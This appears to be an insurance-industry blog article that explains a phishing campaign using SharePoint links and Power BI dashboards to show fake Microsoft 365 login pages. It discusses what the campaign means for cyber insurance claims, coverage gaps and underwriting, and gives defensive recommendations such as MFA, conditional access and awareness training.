When Trusted Platforms Become Phishing Bait: What the Power BI Campaign Means for Cyber Insurance

On February 6, 2025, a new threat intelligence report detailed a phishing campaign that exploits two of the most widely trusted business platforms: Microsoft SharePoint and Power BI. Attackers are sending emails containing legitimate-looking SharePoint links that redirect recipients to a Power BI dashboard. That dashboard hosts a fake Microsoft 365 login page, designed to harvest credentials. The campaign is notable not because of technical sophistication, but because it weaponizes the very tools organizations rely on for daily collaboration and reporting.

For insurance professionals and risk engineers, this attack vector represents a shift in how credential theft occurs—and a corresponding shift in how claims frequency, coverage triggers, and underwriting signals should be evaluated.

What Happened: A Closer Look at the Campaign

The campaign begins with a phishing email that includes a link to a SharePoint file or site. The link is genuine—it points to a legitimate SharePoint domain (e.g., *.sharepoint.com). Once the recipient clicks, SharePoint automatically redirects the user to a Power BI report hosted on the same tenant. The report contains an embedded iframe or a custom visual that displays a convincing Microsoft login prompt.

Because the entire flow stays within Microsoft’s trusted domains, traditional email security filters—which rely on domain reputation and URL scanning—often fail to flag the message as malicious. The user sees a familiar SharePoint interface and a Power BI dashboard, both of which are commonly used in their daily workflow. Trust is the attacker’s primary weapon.

The threat report indicates that the campaign has targeted multiple sectors, including financial services, healthcare, and manufacturing. The stolen credentials are then used for lateral movement, data exfiltration, or as a stepping stone to business email compromise (BEC) attacks.

Why This Matters for Insurance: Claims Frequency and Coverage Gaps

This attack vector directly impacts several areas of cyber insurance exposure:

Increased claims frequency for credential theft. Credential theft is already a leading cause of data breaches and ransomware incidents. When attackers use trusted platforms, the success rate of phishing increases, which means more incidents per insured entity. For underwriters, this suggests that frequency assumptions based on traditional phishing rates may be understated.

Coverage gaps in social engineering and BEC policies. Many cyber insurance policies include sublimits for social engineering fraud or authorized payment instructions. However, the Power BI campaign does not involve direct payment instructions—it steals credentials. Those credentials can later be used to initiate fraudulent wire transfers or modify invoices. The trigger for coverage may depend on whether the loss is classified as “unauthorized access” (covered under network security) or “voluntary parting” (often subject to lower sublimits or exclusion). The ambiguity creates potential disputes.

Policy language for “trusted third-party” services. Some policies exclude losses arising from the use of “trusted” or “authorized” third-party services. Since SharePoint and Power BI are enterprise tools, a loss stemming from their abuse might fall into a gray area. Risk engineers and brokers need to review whether their clients’ policies explicitly address credential theft via legitimate SaaS platforms.

Technical Details in Business Language

From a technical standpoint, the attack is a form of “living off the land” (LotL) applied to phishing. The attacker does not host malicious infrastructure on their own domains. Instead, they abuse the trust that organizations place in Microsoft’s cloud ecosystem.

• SharePoint link: The initial email contains a URL that points to a SharePoint resource. Because the domain is legitimate, email gateways that only check domain reputation pass the message.
• Power BI redirect: SharePoint automatically redirects the user to a Power BI report. This is normal behavior—Power BI reports are often linked from SharePoint. The attacker has uploaded a report that contains a malicious visual or embedded web page.
• Fake login form: The Power BI report displays a login prompt that mimics the Microsoft 365 sign-in page. The user enters their credentials, which are sent to the attacker’s server (often via a webhook or a separate form submission).
• No malware involved: The entire attack is social engineering. No files are downloaded, no macros are executed. This makes it invisible to endpoint detection and response (EDR) tools that focus on executable threats.

For a CISO, the key takeaway is that security awareness training must now include scenarios where trusted internal tools are used as phishing vectors. For an underwriter, the takeaway is that traditional controls (email filtering, antivirus) are insufficient to prevent this class of incident.

Implications for Coverage and Underwriting

Underwriting signals to watch for:

• Multi-factor authentication (MFA) coverage: Does the client enforce MFA for all external-facing applications, including Power BI? If MFA is not required, the stolen credentials can be used directly. If MFA is enforced, the attacker may attempt to bypass it (e.g., through MFA fatigue or session cookie theft). Underwriters should ask whether the client has conditional access policies that block access from untrusted locations.
• Email security controls: Does the client use advanced email security that inspects URL redirect chains and attachment content, not just domain reputation? Solutions that perform real-time scanning of SharePoint links and Power BI reports are still rare.
• Security awareness training: Has the client trained employees to recognize phishing attempts that originate from internal domains? Many awareness programs focus on external emails with suspicious addresses. This campaign bypasses that heuristic.
• Incident response readiness: How quickly can the client detect credential theft when it occurs via a legitimate platform? Logs from SharePoint and Power BI may not be monitored with the same rigor as traditional email logs.

Coverage implications:

• BEC vs. network security: If the stolen credentials are used to initiate a fraudulent wire transfer, the claim may fall under social engineering fraud. If the credentials are used to access data or deploy ransomware, it falls under network security. Policies with separate sublimits for these perils may result in insufficient coverage depending on the attack chain.
• System failure exclusion: Some policies exclude losses caused by “failure of the insured’s security controls.” If the client relies on Microsoft’s security features (e.g., SharePoint’s default sharing settings) and those features are exploited, the carrier might argue that the loss was foreseeable and therefore excluded. This is a developing area of case law.
• Aggregation risk: If multiple clients in the same sector are hit by the same campaign, an insurer could face accumulation of claims. Underwriters should consider whether their portfolio is concentrated in industries that heavily use Power BI and SharePoint.

Actionable Recommendations

For CISOs and risk engineers:

• Implement conditional access policies that require MFA for Power BI access, and block access from non-corporate devices or unknown IP ranges.
• Disable external sharing of Power BI reports unless explicitly approved. Many organizations leave sharing enabled by default.
• Deploy email security solutions that can follow URL redirects and inspect the final landing page’s content. Tools that use computer vision to detect fake login forms can help.
• Include “trusted platform phishing” scenarios in security awareness training. Simulate attacks that use SharePoint and Power BI links to test employee responses.

For insurance professionals:

• Review policy wordings for exclusions related to trusted third-party services. Ensure that credential theft via SaaS platforms is explicitly addressed.
• Update underwriting questionnaires to include questions about MFA enforcement on collaboration tools, email security capabilities, and incident response monitoring for cloud platforms.
• Consider portfolio concentration risk if many insureds rely on the same platforms (e.g., Microsoft 365) and could be affected by a single campaign.

For more guidance on how these attack vectors affect cyber insurance underwriting and claims, visit Resiliently’s cyber risk resources.